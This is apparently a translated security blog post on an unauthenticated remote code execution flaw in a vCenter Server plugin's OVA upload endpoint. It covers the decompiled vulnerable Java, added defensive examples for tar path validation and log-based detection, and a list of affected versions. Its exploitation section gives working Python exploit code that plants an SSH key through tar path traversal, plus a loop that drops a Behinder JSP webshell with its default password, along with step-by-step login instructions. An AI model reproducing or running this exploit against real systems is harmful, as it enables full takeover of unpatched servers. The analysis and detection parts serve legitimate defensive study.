VCenter Server RCE

admin, 2021-12-31 03:56:39

  • Vulnerability analysis
    A remote code execution vulnerability exists in a vCenter Server plugin. An unauthenticated attacker can send a specially crafted request to vCenter Server through the service exposed on port 443, write a webshell onto the server, and ultimately execute arbitrary code remotely.
  • Source-level sink: the *uploadova* interface provides a function for uploading OVA files:

```java
@RequestMapping(
    value = {"/uploadova"},
    method = {RequestMethod.POST}
)
public void uploadOvaFile(@RequestParam(value = "uploadFile", required = true) CommonsMultipartFile uploadFile,
                          HttpServletResponse response) throws Exception {
    logger.info("Entering uploadOvaFile api");
    int code = uploadFile.isEmpty() ? 400 : 200;
    PrintWriter wr = null;
    ...
    response.setStatus(code);
    String returnStatus = "SUCCESS";
    if (!uploadFile.isEmpty()) {
        try {
            logger.info("Downloading OVA file has been started");
            logger.info("Size of the file received : " + uploadFile.getSize());
            InputStream inputStream = uploadFile.getInputStream();
            File dir = new File("/tmp/unicorn_ova_dir");
            if (!dir.exists()) {
                dir.mkdirs();
            } else {
                String[] entries = dir.list();
                String[] var9 = entries;
                int var10 = entries.length;

                for (int var11 = 0; var11 < var10; ++var11) {
                    String entry = var9[var11];
                    File currentFile = new File(dir.getPath(), entry);
                    currentFile.delete();
                }

                logger.info("Successfully cleaned : /tmp/unicorn_ova_dir");
            }

            TarArchiveInputStream in = new TarArchiveInputStream(inputStream);
            TarArchiveEntry entry = in.getNextTarEntry();
            ArrayList result = new ArrayList();

            while (entry != null) {
                if (entry.isDirectory()) {
                    entry = in.getNextTarEntry();
                } else {
                    // entry.getName() comes straight from the archive and is joined
                    // to the fixed directory without any validation
                    File curfile = new File("/tmp/unicorn_ova_dir", entry.getName());
                    File parent = curfile.getParentFile();
                    if (!parent.exists()) {
                        parent.mkdirs();
                    }
                    // ... decompiled excerpt ends here; the entry is then written to curfile
                }
            }
            // ... remainder of the method not shown
```

The TAR entry's file name is concatenated directly with /tmp/unicorn_ova_dir and the file is written there. If the file name contains ../, directory traversal is possible.
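For contrast, here is an added example (not from the original post and not VMware's code) of the check the handler above lacks: every tar member name is normalised against the extraction directory and rejected if it resolves outside it, and link members are refused as well, since a link can redirect a later write even when its own name looks harmless. The archive and its two entries are constructed inline for the example; the only value taken from the page is the extraction directory /tmp/unicorn_ova_dir.

```python
import io
import posixpath
import tarfile

# Extraction directory hard-coded in the decompiled handler (from the page)
BASE_DIR = "/tmp/unicorn_ova_dir"


def is_path_within(base_dir, member_name):
    """True if joining member_name under base_dir stays inside base_dir.

    This is the check the handler omits: it does new File(base_dir, entry.getName())
    and writes straight away, so a name such as ../../x lands outside the directory.
    """
    if not member_name or member_name.startswith("/"):
        return False
    base = posixpath.normpath(base_dir)
    joined = posixpath.normpath(posixpath.join(base, member_name))
    return joined == base or joined.startswith(base + "/")


def audit_tar(data):
    """Inspect every member of a tar archive (bytes) without extracting anything.

    Returns a list of (member_name, verdict) in archive order.
    """
    findings = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for member in tar.getmembers():
            if member.isdir():
                continue
            if member.issym() or member.islnk():
                # A link member can redirect a later write even when its own name looks safe
                findings.append((member.name, "reject: link member"))
            elif is_path_within(BASE_DIR, member.name):
                findings.append((member.name, "ok"))
            else:
                findings.append((member.name, "reject: escapes extraction directory"))
    return findings


def build_sample_tar():
    """Constructed test archive: one benign OVA-style entry and one traversal entry of
    the shape shown in the post (the content is a dummy string, not a real key)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        entries = [
            ("ova/descriptor.ovf", b"<Envelope/>"),
            ("../../../home/vsphere-ui/.ssh/authorized_keys", b"ssh-rsa DUMMYKEY test"),
        ]
        for name, content in entries:
            info = tarfile.TarInfo(name=name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


if __name__ == "__main__":
    for name, verdict in audit_tar(build_sample_tar()):
        print(f"{verdict:40s} {name}")
```

The audit runs over `getmembers()` only, so nothing touches disk; in a real handler the same `is_path_within` test would run before each `addfile`/write, and the whole upload should be rejected on the first bad member rather than skipping it.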

  • Exploitation
    A TAR file containing ../../home/vsphere-ui/.ssh/authorized_keys can be created and uploaded, after which SSH login is possible.
    A JSP webshell file can be written on the target server; because the service runs with System privileges, arbitrary file writes are possible.

EXP

  • SSH connection

On Linux, use the file upload to achieve remote SSH login.

Create the user vsphere-ui locally.


Switch to the newly created user and generate an authentication key pair.

```shell
ssh-keygen -t rsa
```

Copy the generated id_rsa.pub into the EXP code below.

```python
import tarfile
from io import BytesIO
import requests


def return_zip():
    # Build test.tar with a single entry whose name walks out of
    # /tmp/unicorn_ova_dir into the vsphere-ui user's authorized_keys
    with tarfile.open("test.tar", 'w') as tar:
        # Paste the id_rsa.pub you generated here
        id_rsa_pub = 'ssh-rsa <PASTE_YOUR_id_rsa.pub_HERE> vsphere-ui@cipher'
        tarinfo = tarfile.TarInfo(name='../../../home/vsphere-ui/.ssh/authorized_keys')
        f1 = BytesIO(id_rsa_pub.encode())
        tarinfo.size = len(f1.getvalue())
        tar.addfile(tarinfo, fileobj=f1)


def getshell(url):
    files = {'uploadFile': open('test.tar', 'rb')}
    try:
        r = requests.post(url=url, files=files, verify=False).text
        print(r)
    except requests.RequestException:
        print('Failed to connect to the server')


if __name__ == "__main__":
    try:
        return_zip()
        # Enter the vulnerable URL: https://xxx.xxx.xxx.xxx
        url = "https://xxx.xxx.xxx.xxx/ui/vropspluginui/rest/services/uploadova"
        getshell(url)
    except IOError as e:
        raise e
```

Capture the request with Burp Suite to inspect it.


Once the EXP has run successfully, you can log in to the vulnerable server over SSH.

```shell
ssh vsphere-ui@xxx.xxx.xxx.xxx
```


  • Webshell connection

```python
import requests

# Excerpt from the exploit tool: archive(), checkShellExist(), the LINUX_* constants,
# VUL_URI, TIMEOUT and headers are defined elsewhere in that tool.
def uploadLinuxRandomPayload(URL):
    # By default the script inserts the shell file in a loop up to 120 times. After the
    # first insertion it asks the crawler to check whether the shell file was written;
    # once the check succeeds the EXP stops inserting and exits.
    for i in range(0, 120):
        archive(
            LINUX_RANDOM_PAYLOAD_SOURCE,
            "/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/{REPLACE_RANDOM_ID_HERE}/0/h5ngc.war/resources/shell.jsp".format(
                REPLACE_RANDOM_ID_HERE=i
            ),
        )
        file = {"uploadFile": open(LINUX_RANDOM_PAYLOAD_TARFILE, "rb")}
        re = requests.post(
            URL + VUL_URI, files=file, verify=False, timeout=TIMEOUT, headers=headers
        )
        if "SUCCESS" in re.text and checkShellExist(URL + LINUX_SHELL_URL):
            print(
                "[+] Shell exist URL: {url}, default password:rebeyond".format(
                    url=URL + LINUX_SHELL_URL
                )
            )
            print(
                "[+] Found Server Path exists!!!! Try times {REPLACE_RANDOM_ID_HERE}".format(
                    REPLACE_RANDOM_ID_HERE=i
                )
            )
            exit()
```

The tar file in the tool's payload folder embeds Behinder (冰蝎) 3, so Behinder is used directly to connect, and the shell is obtained.
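From the defender's side, the two exploitation paths above leave a clear trace in the web server access log. The following is an added example (not from the original post and not part of the tool it describes) that scans log lines for POST requests to the uploadova endpoint, for bursts of such POSTs from one client (the tool above retries up to 120 times), and for requests to .jsp files under /ui/, where the webshell lands. The endpoint path is the one named on the page; the common-log-format layout, the regex and the sample lines are constructed for the example, since the page does not show vCenter's real access log format.

```python
import re
from collections import defaultdict
from datetime import datetime

# Endpoint named on the page; everything else about the log layout below is assumed
UPLOAD_ENDPOINT = "/ui/vropspluginui/rest/services/uploadova"

# Assumed common-log-format line: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample log: one client uploads three archives within a few seconds and then
# requests a JSP; a second client's upload is rejected with 400
SAMPLE_LOG = """\
203.0.113.7 - - [31/Dec/2021:03:50:01 +0000] "GET /ui/ HTTP/1.1" 200 5120
203.0.113.7 - - [31/Dec/2021:03:50:03 +0000] "POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1" 200 17
203.0.113.7 - - [31/Dec/2021:03:50:04 +0000] "POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1" 200 17
203.0.113.7 - - [31/Dec/2021:03:50:05 +0000] "POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1" 200 17
203.0.113.7 - - [31/Dec/2021:03:50:06 +0000] "GET /ui/resources/shell.jsp HTTP/1.1" 200 88
198.51.100.2 - - [31/Dec/2021:03:55:00 +0000] "POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1" 400 0
"""


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match the assumed format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], TS_FMT)
    return ev


def detect(log_text, burst_threshold=3, window_seconds=60):
    """Return a list of (client_ip, rule, detail) alerts.

    uploadova_post  - any POST to the upload endpoint; the page says it needs no
                      authentication, so every hit deserves a look
    jsp_under_ui    - a request for a .jsp under /ui/, where the post's webshell is written
    uploadova_burst - burst_threshold or more POSTs from one client within window_seconds
    """
    alerts = []
    posts_by_ip = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["method"] == "POST" and ev["path"] == UPLOAD_ENDPOINT:
            alerts.append((ev["ip"], "uploadova_post", ev["status"]))
            posts_by_ip[ev["ip"]].append(ev["ts"])
        elif ev["path"].startswith("/ui/") and ev["path"].split("?")[0].endswith(".jsp"):
            alerts.append((ev["ip"], "jsp_under_ui", ev["path"]))
    # Sliding window over each client's sorted POST timestamps
    for ip, times in posts_by_ip.items():
        times.sort()
        for i in range(len(times) - burst_threshold + 1):
            j = i + burst_threshold - 1
            if (times[j] - times[i]).total_seconds() <= window_seconds:
                alerts.append((ip, "uploadova_burst", f"{burst_threshold} POSTs within {window_seconds}s"))
                break
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

A 400 on the endpoint (an empty upload, per the handler's `isEmpty()` check) still counts as a probe, which is why the second client is reported even though its upload failed; the burst rule is what separates the retry loop from a single probe.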



  • Affected versions:
    vCenter Server 7.0 < 7.0U1c
    vCenter Server 6.7 < 6.7U3l
    vCenter Server 6.5 < 6.5U3n
    Cloud Foundation (vCenterServer) 4.X < 4.2
    Cloud Foundation (vCenterServer) 3.X < 3.10.1.2

Source: CN-SEC中文网, https://cn-sec.com/archives/692016.html